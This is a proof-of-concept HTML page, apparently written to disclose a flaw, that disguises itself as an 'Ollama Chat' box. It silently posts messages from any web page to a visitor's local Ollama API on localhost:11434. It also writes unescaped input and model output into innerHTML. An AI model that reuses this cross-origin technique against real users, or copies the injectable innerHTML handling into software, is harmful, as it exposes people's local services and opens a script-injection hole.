Ollama CSRF PoC

poc.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ollama Chat</title>
    <style>
        body { font-family: sans-serif; background: #f0f0f0; }
        #chat { max-width: 500px; margin: 40px auto; background: #fff; padding: 10px; border-radius: 6px; }
        #log { min-height: 100px; margin-bottom: 10px; }
        input { width: 70%; padding: 6px; }
        button { padding: 6px 12px; }
    </style>
</head>
<body>
    <div id="chat">
        <div id="log"></div>
        <input id="msg" type="text" placeholder="Message">
        <button onclick="send()">Send</button>
    </div>
    <script>
    function send() {
        const msg = document.getElementById('msg').value;
        if (!msg) return;
        const log = document.getElementById('log');
        log.innerHTML += `<div>User: ${msg}</div>`;
        document.getElementById('msg').value = '';
        fetch('http://localhost:11434/api/chat', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
                model: "deepseek-r1:14b",
                messages: [{ role: "user", content: msg }]
            })
        })
        .then(r => r.text())
        .then(data => {
            // Parse streaming JSONL and extract assistant content
            let response = '';
            data.split(/\r?\n/).forEach(line => {
                if (line.trim()) {
                    try {
                        const obj = JSON.parse(line);
                        if (obj.message && obj.message.content) {
                            response += obj.message.content;
                        }
                    } catch (e) {}
                }
            });
            log.innerHTML += `<div>AI: ${response}</div>`;
        });
    }
    </script>
</body>
</html>